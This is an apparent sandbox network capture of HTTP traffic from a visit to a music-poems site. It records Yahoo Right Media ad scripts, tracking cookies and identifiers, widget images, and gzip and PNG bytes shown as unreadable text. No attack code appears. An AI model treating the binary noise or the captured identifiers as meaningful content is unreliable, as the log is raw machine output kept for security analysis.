Set-Cookie: uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; path=/; expires=Wed, 21-May-2014 11:57:29 GMT

Set-Cookie: liday1=iSs5t#Kdr=!6tS($AOnF; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT

Set-Cookie: RMBX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT

Set-Cookie: RMBX=7atjd219la1t9&b=3&s=iu&t=110; path=/; expires=Thu, 21-Apr-2016 11:57:29 GMT; domain=.yahoo.com

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Vary: *

Last-Modified: Mon, 21 Apr 2014 11:57:29 GMT

Expires: Mon, 21 Apr 2014 11:57:29 GMT

Pragma: no-cache

Content-Type: application/x-javascript

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

2cf..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjV9rgzAUxT-Nb07y56bNCHuI1cigCSso2.rWOWu0cRVMseunn1LpB9jhcvhd7j0cTAXDz9V3dUAY1hyvCAgMjANhR4QgREIIQsmacMxXOCz9j8t8fyjqDdw-TrGcpZt9uZN31bO93vmNz75JqFXtckYN0wumFgb5f8VpFJ8XnvrGqTrhcqi4s2kRP94SdTLt7vaZS9i-a2Yy7XWunP7Fjc6KcZuXdN8VV9PWSBPjzPhIvoSh9b4PqAyImuYS9Zevp2Pjo.LcTTsBBpH1nQuoGgKaUISuhKE.WBteBA==,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 24759736;.rm_data.offer_type = 49;.rm_data.entity_id = 882998;..if (window.rm_crex_data) {rm_crex_data.push(24759736);}..0..0......

<<

<<< skipped >>>

GET /get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:43 GMT

P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"

Cache-Control: private

Content-Type: text/javascript

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

Server: YTS/1.20.13

0......

GET /st?ad_type=ad&ad_size=300x250&section=5397210 HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:44 GMT

Server: YTS/1.20.13

X-RightMedia-Hostname: raptor0230.rm.bf1.yahoo.com

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Vary: *

Last-Modified: Mon, 21 Apr 2014 11:57:44 GMT

Expires: Mon, 21 Apr 2014 11:57:44 GMT

Pragma: no-cache

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

1000../* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";var rm_md_purl_det=0;var rm_md_purl_dec=0;var rm_md_purl_st_ref=0;var rm_st_referrer="";var rm_md_purl_unknown=0;var rm_enable_ck_mp=0;var rm_ck_mp_cu="";rm_md_purl_det = "4"; rm_md_purl_dec = "3"; rm_md_purl_st_ref = "5"; rm_st_referrer = "hXXp://u.pub-fit.com/2454.html?s=300x250"; rm_md_purl_unknown = "0"; rm_enable_ck_mp = 1; rm_tag_type = "ad"; rm_url = "hXXp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=1531230313";rm_ck_mp_cu = "hXXp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(rm_crex_data.length>0){rm_url ="&X=";for(var i=0;i<rm_crex_data.length;i ){rm_url =rm_crex_data[i];if(i!=rm_crex_data.length-1){rm_url =",";}}}}else{rm_pb_data.push(rm_crex_data.pop());rm_url ="&X=";for(var i=0;i<rm_pb_data.length;i ){rm_url =rm_pb_data[i];if(i!=rm_pb_data.length-1){rm_url =",";}}rm_url ="&Y=pb";}var flash=new Object();flash=flashDetection();if(cookiesEnabled()){rm_url =(flash.installed?"&B=10":"&B=12");}else{rm_url =(flash.installed?"&B=11":"&B=13");}if(!flash.installed||rm_ban_flash==1){rm_url ="&m=2";}var url='';try{if(rm_tag_type=="ad"){if(top==self){url=encodeURIComponent

<<

<<< skipped >>>

GET /get-user-id?ver=2&s=5397210&ts=1398081464&sig=616b1a54b12efba8 HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; vuday1=IsXSsIsXSs!6tS(%T)C/; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:44 GMT

P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"

Cache-Control: private

Content-Type: text/javascript

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

Server: YTS/1.20.13

0..HTTP/1.1 200 OK..Date: Mon, 21 Apr 2014 11:57:44 GMT..P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"..Cache-Control: private..Content-Type: text/javascript..Age: 0..Transfer-Encoding: chunked..Connection: keep-alive..Server: YTS/1.20.13..0..

GET /small/05/560.png HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: widgets.amung.us

HTTP/1.1 200 OK

Server: nginx/1.2.4

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: image/png

Content-Length: 330

Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT

Connection: keep-alive

Expires: Wed, 21 May 2014 11:57:29 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

.PNG........IHDR...P.........D......9PLTE.bM.nX.82.G:................zc.....z.UC..n.'-00/...555...........IDAT8...... .....A......s..?q..c&., nm,.r.<M....GGP7s. .......x...!..~.5.....4_..._`.$.P.c.~. .... q.@#.".,..K..>.... .....%.YC}INrz ;.'....9.b.Z.....C...G./.X.Vz....(.<.....l.;.c.a:...\.s..[..,.6....rc}.I>I...oZ....IEND.B`.HTTP/1.1 200 OK..Server: nginx/1.2.4..Date: Mon, 21 Apr 2014 11:57:29 GMT..Content-Type: image/png..Content-Length: 330..Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT..Connection: keep-alive..Expires: Wed, 21 May 2014 11:57:29 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes...PNG........IHDR...P.........D......9PLTE.bM.nX.82.G:................zc.....z.UC..n.'-00/...555...........IDAT8...... .....A......s..?q..c&., nm,.r.<M....GGP7s. .......x...!..~.5.....4_..._`.$.P.c.~. .... q.@#.".,..K..>.... .....%.YC}INrz ;.'....9.b.Z.....C...G./.X.Vz....(.<.....l.;.c.a:...\.s..[..,.6....rc}.I>I...oZ....IEND.B`...

GET /swidget/h20d2qja0b7p.gif HTTP/1.1

Accept: */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: whos.amung.us

Connection: Keep-Alive

HTTP/1.1 303 See Other

Date: Mon, 21 Apr 2014 11:57:29 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://widgets.amung.us/small/05/560.png

Set-Cookie: uid=CgH9IFNVB6ljRxZt0akKAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=atta; path=/

0..

GET /st?ad_type=ad&ad_size=300x250&section=5397210 HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:29 GMT

Server: YTS/1.20.13

X-RightMedia-Hostname: raptor0801.rm.bf1.yahoo.com

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

Set-Cookie: B=7atjd219la1t9&b=3&s=iu; path=/; expires=Thu, 21-Apr-2016 11:57:29 GMT; domain=.yahoo.com

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Vary: *

Last-Modified: Mon, 21 Apr 2014 11:57:29 GMT

Expires: Mon, 21 Apr 2014 11:57:29 GMT

Pragma: no-cache

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

1000../* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";var rm_md_purl_det=0;var rm_md_purl_dec=0;var rm_md_purl_st_ref=0;var rm_st_referrer="";var rm_md_purl_unknown=0;var rm_enable_ck_mp=0;var rm_ck_mp_cu="";rm_md_purl_det = "4"; rm_md_purl_dec = "3"; rm_md_purl_st_ref = "5"; rm_st_referrer = "hXXp://u.pub-fit.com/2454.html?s=300x250"; rm_md_purl_unknown = "0"; rm_enable_ck_mp = 1; rm_tag_type = "ad"; rm_url = "hXXp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=3369660399";rm_ck_mp_cu = "hXXp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(rm_crex_data.length>0){rm_url ="&X=";for(var i=0;i<rm_crex_data.length;i ){rm_url =rm_crex_data[i];if(i!=rm_crex_data.length-1){rm_url =",";}}}}else{rm_pb_data.push(rm_crex_data.pop());rm_url ="&X=";for(var i=0;i<rm_pb_data.length;i ){rm_url =rm_pb_data[i];if(i!=rm_pb_data.length-1){rm_url =",";}}rm_url ="&Y=pb";}var flash=new Object();flash=flashDetection();if(cookiesEnabled()){rm_url =(flash.installed?"&B=10":"&B=12");}else{rm_url =(flash.installed?"&B=11":"&B=13");}if(!flash.installed||rm_ban_flash==1){rm_url ="&m=2";}var url='';try{if(rm_tag_type=="ad"){if(top==self){url=encodeURIComponent

<<

<<< skipped >>>

GET /get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

Cookie: B=7atjd219la1t9&b=3&s=iu

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:29 GMT

P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"

Set-Cookie: RMBX=7atjd219la1t9&b=3&s=iu&t=110; path=/; expires=Wed, 20-Apr-2016 11:57:29 GMT

Cache-Control: private

Content-Type: text/javascript

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

Server: YTS/1.20.13

0..HTTP/1.1 200 OK..Date: Mon, 21 Apr 2014 11:57:29 GMT..P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"..Set-Cookie: RMBX=7atjd219la1t9&b=3&s=iu&t=110; path=/; expires=Wed, 20-Apr-2016 11:57:29 GMT..Cache-Control: private..Content-Type: text/javascript..Age: 0..Transfer-Encoding: chunked..Connection: keep-alive..Server: YTS/1.20.13..0......

GET /st?ad_type=ad&ad_size=300x250&section=5397210 HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:43 GMT

Server: YTS/1.20.13

X-RightMedia-Hostname: raptor0230.rm.bf1.yahoo.com

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Vary: *

Last-Modified: Mon, 21 Apr 2014 11:57:43 GMT

Expires: Mon, 21 Apr 2014 11:57:43 GMT

Pragma: no-cache

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

1000../* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";var rm_md_purl_det=0;var rm_md_purl_dec=0;var rm_md_purl_st_ref=0;var rm_st_referrer="";var rm_md_purl_unknown=0;var rm_enable_ck_mp=0;var rm_ck_mp_cu="";rm_md_purl_det = "4"; rm_md_purl_dec = "3"; rm_md_purl_st_ref = "5"; rm_st_referrer = "hXXp://u.pub-fit.com/2454.html?s=300x250"; rm_md_purl_unknown = "0"; rm_enable_ck_mp = 1; rm_tag_type = "ad"; rm_url = "hXXp://ads.yahoo.com/imp?Z=300x250&s=5397210&_salt=2659402730";rm_ck_mp_cu = "hXXp://ads.yahoo.com/get-user-id?ver=2&s=5397210&ts=1398081463&sig=076f97ecda33a47a";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(rm_crex_data.length>0){rm_url ="&X=";for(var i=0;i<rm_crex_data.length;i ){rm_url =rm_crex_data[i];if(i!=rm_crex_data.length-1){rm_url =",";}}}}else{rm_pb_data.push(rm_crex_data.pop());rm_url ="&X=";for(var i=0;i<rm_pb_data.length;i ){rm_url =rm_pb_data[i];if(i!=rm_pb_data.length-1){rm_url =",";}}rm_url ="&Y=pb";}var flash=new Object();flash=flashDetection();if(cookiesEnabled()){rm_url =(flash.installed?"&B=10":"&B=12");}else{rm_url =(flash.installed?"&B=11":"&B=13");}if(!flash.installed||rm_ban_flash==1){rm_url ="&m=2";}var url='';try{if(rm_tag_type=="ad"){if(top==self){url=encodeURIComponent

<<

<<< skipped >>>

GET /imp?Z=300x250&s=5397210&_salt=2659402730&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:43 GMT

Server: YTS/1.20.13

X-RightMedia-Hostname: raptor2111.rm.bf1.yahoo.com

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

Set-Cookie: ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; path=/; expires=Wed, 20-Apr-2016 11:57:43 GMT

Set-Cookie: vuday1=IsXSsIsXSs!6tS(%T)C/; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT

Set-Cookie: liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Vary: *

Last-Modified: Mon, 21 Apr 2014 11:57:43 GMT

Expires: Mon, 21 Apr 2014 11:57:43 GMT

Pragma: no-cache

Content-Type: application/x-javascript

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

2cb..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjd1qhDAQRp.GOyv5tZHQi7gaka5uKcpuvFNBo5iupVls-.RVVtr7fgwfZ5iBAzFvOp82pAMEM1DjoOaQUEaQj.wGuYBzjnzwGATQB8xt7duU2Lku-8MlVEsotpwusF3EPf1W6Z1f2NaHCGs57mf5enre8V2nRPw.YeyF151X3-rvIybUoIyOy.D3LUqhMhmtznI8njOaJ5nNCjllX3CoivL7WMRLPgqgjJyqpIT5n-DJdbW1s4OFg-Q6N2--NQ.dYL32atYdEUo8bc3kYPnh4AgD8Iko-AGz-l3-,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 25953687;.rm_data.offer_type = 60;.rm_data.entity_id = 985256;..if (window.rm_crex_data) {rm_crex_data.push(25953687);}..0..0......

<<

<<< skipped >>>

GET /imp?Z=300x250&s=5397210&_salt=1531230313&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ads.yahoo.com

Connection: Keep-Alive

Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; vuday1=IsXSsIsXSs!6tS(%T)C/; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c

HTTP/1.1 200 OK

Date: Mon, 21 Apr 2014 11:57:44 GMT

Server: YTS/1.20.13

X-RightMedia-Hostname: raptor0232.rm.bf1.yahoo.com

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

Set-Cookie: ih="b!!!!%!L>v#!!!!#>gR*'!N94=!!!!#>gR*6!N94N!!!!#>gR*5"; path=/; expires=Wed, 20-Apr-2016 11:57:44 GMT

Set-Cookie: vuday1=IsXSsIsXSs!6tS(%T)C/; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT

Set-Cookie: liday1=iSs5t)ghL.1^Rke#Kdr=!6tS(%ILCn; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Vary: *

Last-Modified: Mon, 21 Apr 2014 11:57:44 GMT

Expires: Mon, 21 Apr 2014 11:57:44 GMT

Pragma: no-cache

Content-Type: application/x-javascript

Age: 0

Transfer-Encoding: chunked

Connection: keep-alive

2cf..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjVFPgzAUhX8Nb0jKbYslZA.toIS4OmNYFN42ZNQKDmMXnL.ekpH9AE9uTr6Te29OiJP2COgQxfesgTfUAk1CQhmBCNi-9VGSJDiOMHM5jv3Gfva5Hfe7bp2LahJ81vY1bCZ-VTdbceUnNvs6xVqaZS2ftw8LfumC8P9LZIE4Lez6XH-XMl5dukFnO3E7SwtQuRxqo.vNi6KPubKqlL26IMe12ZTSVL.yoy45qk0G1XT7XPm-tnb0MPdAujkH4.lwd3y3QXMaXAZCSaDt0HtYfns4xQj9AEV.DWFedw==,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 25953670;.rm_data.offer_type = 60;.rm_data.entity_id = 985256;..if (window.rm_crex_data) {rm_crex_data.push(25953670);}..0..0..

<<

<<< skipped >>>

GET /2454.html?s=300x250 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: u.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT

ETag: f0908d483f8ef53a51e6767d7fecbe97

X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1

Accept-Ranges: bytes

X-Timestamp: 1392737142.11331

Content-Type: text/html

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 382

Cache-Control: public, max-age=673

Expires: Mon, 21 Apr 2014 12:08:41 GMT

Date: Mon, 21 Apr 2014 11:57:28 GMT

Connection: keep-alive

..........m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n..........

GET /2454.html?s=300x250 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://esmusicon.com/Poemas/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: u.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT

ETag: f0908d483f8ef53a51e6767d7fecbe97

X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1

Accept-Ranges: bytes

X-Timestamp: 1392737142.11331

Content-Type: text/html

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 382

Cache-Control: public, max-age=673

Expires: Mon, 21 Apr 2014 12:08:41 GMT

Date: Mon, 21 Apr 2014 11:57:28 GMT

Connection: keep-alive

..........m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n......HTTP/1.1 200 OK..Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT..ETag: f0908d483f8ef53a51e6767d7fecbe97..X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1..Accept-Ranges: bytes..X-Timestamp: 1392737142.11331..Content-Type: text/html..Vary: Accept-Encoding..Content-Encoding: gzip..Content-Length: 382..Cache-Control: public, max-age=673..Expires: Mon, 21 Apr 2014 12:08:41 GMT..Date: Mon, 21 Apr 2014 11:57:28 GMT..Connection: keep-alive............m.Qo. ..........M...N..j.C.*.....(\l*...W{...p..a........\.`...'.G.ql..:.jc.s?d.2.`<..}:A..x.?.[6[.{..8Kjf.k...%....}.el.....%9...V&.5g...N....k..S..A.............?...P...........%..F.....t{}Kn../.o...6U. .EQH..(...r].q-..Q....F..*.'T.<...Ga...._>.......z....7..:.. |.t.7x.z3@ j._....,$...F.i.....S....7...&.;...!...n...-....:E.D..qa..eF^......L.`..IDY.9..M....4...n........

<<

<<< skipped >>>

GET / HTTP/1.1

User-Agent: Mozilla/4.0

